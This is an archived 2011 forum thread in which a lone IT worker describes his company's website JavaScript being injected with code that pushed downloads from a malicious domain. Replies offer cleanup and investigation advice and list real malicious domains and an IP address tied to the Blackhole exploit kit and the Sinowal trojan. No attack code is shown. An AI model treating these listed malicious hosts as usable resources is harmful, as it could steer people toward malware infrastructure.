mrmaxx Posted July 14, 2011 Share Posted July 14, 2011 I found that someone had hacked into our webserver last Sunday (July 10th) and added a few lines of code to all our java scri_pt files. Basically it was causing anyone visiting the website with internet explorer to start to download a file from mhjldbgmfds.com. No that's not a made up domain. That's the actual domain name that was trying to download something to my computer at work earlier today when I visited my company's website using internet explorer. Link to comment Share on other sites More sharing options...
Wazoo Posted July 14, 2011 Share Posted July 14, 2011 I found that someone had hacked into our webserver last Sunday (July 10th) and added a few lines of code to all our java scri_pt files. I know you said that the server was hacked, but ,,,, the 'adding a few lines to all the .js files' seems extremely out of the ordinary. More typical is the action of adding in something like an iframe bit to effect this sort of cross-site-scripting. The quick-check would be something simple like the file-dates of the web-page creation files .... the typical hack of this sort would leave an .html or .php file with the most recent date showing. But, yes, it would depend on the craftiness of the hacker. download something to my computer at work earlier today when I visited my company's website using internet explorer. lthough my immediate reaction would be to get the bad code off-line and replaced with a copy of the 'backed-up good' version, the question of analysis is still valid, I suppose. Again, my first reaction .... hit it with the FireFox add-on tool "firebug" which would allow one to pretty much see the page make-up. You didn't say whether you had anything above user-level access to this server, but even then, the majority of the codebase structure should be available. Of course, the killer question is whether the hack vector has been discovered and closed. The entrance may not have actually been a server-hack, it may boil down to an exploitable application running on the web-server, the more typical problem of something allowed to get into the SQL database that then gets included on the displayed pages that is allowed to progress on exploitable (or trusting) web-bowers. Link to comment Share on other sites More sharing options...
Farelf Posted July 15, 2011 Share Posted July 15, 2011 ...anyone visiting the website with internet explorer to start to download a file from mhjldbgmfds.com. No that's not a made up domain. That's the actual domain name that was trying to download something to my computer at work earlier today when I visited my company's website using internet explorer. Searching http://www.malwaredomainlist.com/mdl.php mhjldbgmfds.com 46.165.192.232 blackhole exploit kit 46.165.192.232 trojan Sinowal 46.165.192.232 mhjldbgmfds.com blackhole exploit kit mhjldbgmfds.com trojan Sinowal aopq3ohkrb.com blackhole exploit kit 53t3ghkjksd.com blackhole exploit kit 4uiokwnbe.com blackhole exploit kit isj23hgggjg.com blackhole exploit kit sdi2u3i2h.com blackhole exploit kit kdjeiuhebn.com blackhole exploit kit hdjwuy2gvn.com blackhole exploit kit tbcfleatfds.com blackhole exploit kit uwjkq3b3vhv.com blackhole exploit kit Link to comment Share on other sites More sharing options...
mrmaxx Posted July 15, 2011 Author Share Posted July 15, 2011 Of course, the killer question is whether the hack vector has been discovered and closed. The entrance may not have actually been a server-hack, it may boil down to an exploitable application running on the web-server, the more typical problem of something allowed to get into the SQL database that then gets included on the displayed pages that is allowed to progress on exploitable (or trusting) web-bowers. Well, we're still not sure how the hacker got in, but the only apparent date changes were to the .js files which added the download of an apparent known malware. I did go in and edit the .js files and removed the offending code and it now comes up clean. I also had the webhost change the ftp actions to block access by anyone coming from any IP other than our own external IP. That may or may not solve the problem, but it's a start. There were also a number of Windows Updates that needed to be installed, so we installed them. I suppose I ought to log in about once a week and see if there are any more updates to install, or should I just say "the heck with it" and let them auto-install???? Searching http://www.malwaredomainlist.com/mdl.php mhjldbgmfds.com 46.165.192.232 blackhole exploit kit 46.165.192.232 trojan Sinowal 46.165.192.232 mhjldbgmfds.com blackhole exploit kit mhjldbgmfds.com trojan Sinowal Yeah... I pretty much figured it was malware it was trying to download. :angry: I don't like having to worry about the website as well as the internal machines... but for now, I guess I'm stuck with it. I really don't like people exposing our website visitors to malware, potentially costing us sales! :angry: Link to comment Share on other sites More sharing options...
Harold Quinton Posted August 25, 2011 Share Posted August 25, 2011 I found that someone had hacked into our webserver last Sunday (July 10th) and added a few lines of code to all our java scri_pt files. Basically it was causing anyone visiting the website with internet explorer to start to download a file from mhjldbgmfds.com. No that's not a made up domain. That's the actual domain name that was trying to download something to my computer at work earlier today when I visited my company's website using internet explorer. No offense, but it seems to me like you need to hire some new people in your tech department. Link to comment Share on other sites More sharing options...
mrmaxx Posted August 29, 2011 Author Share Posted August 29, 2011 No offense, but it seems to me like you need to hire some new people in your tech department. No offense taken. I would welcome more people in our IT Department since I'm the entire IT department and I know next to nothing about web programming, etc. Unfortunately, it ain't gonna happen, so I muddle along as best I can. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.